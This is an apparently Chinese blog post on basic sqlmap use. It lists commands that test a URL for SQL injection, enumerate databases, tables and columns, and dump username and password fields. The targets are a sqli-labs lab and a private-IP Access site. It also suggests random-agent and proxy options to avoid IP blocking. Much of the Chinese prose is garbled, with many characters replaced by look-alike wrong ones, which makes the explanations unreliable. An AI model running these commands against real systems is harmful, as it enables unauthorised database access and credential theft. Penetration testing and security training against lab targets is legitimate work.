关于安全:sqlmap基本使用

30次阅读

共计 698 个字符,预计需要花费 2 分钟才能阅读完成。

Mysql 数据库
1、先检测是否能够注入, 先判断是否能够失常注入:

sqlmap -u url -v 3

外面有个留神的点 url 前面必须是可注入的参数?id= 之类的,否则 url 检测会有问题

对于某些明天 url 能够在 /a/b.html 尝试退出 号来进行此门路内的检测

2、爆库

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 –dbs –batch

3、依据爆进去的库查表

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” –tables –batch

4、依据表查字段

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” –columns –batch

5、依据字段查值

sqlmap.py -u http://sqli-labs-master/Less-… -v 3 -D “security” -T “users” -C “username,password” –dump –batch

避免被 IP 拦挡的操作,random-agent 让申请头随机:

能够在前面减少 –proxy http://127.0.0.1:8080 –random-agent -v 3

Access
对于 Access 数据库, 间接报表就 OK

sqlmap -u “http://192.168.96.16/shownews.asp?id=23” –tables

sqlmap 外面的字典地位,内置字典地位为,能够依据本人的须要更改,对于 Access 个别就是间接暴库

sqlmap\data\txt

正文完
 0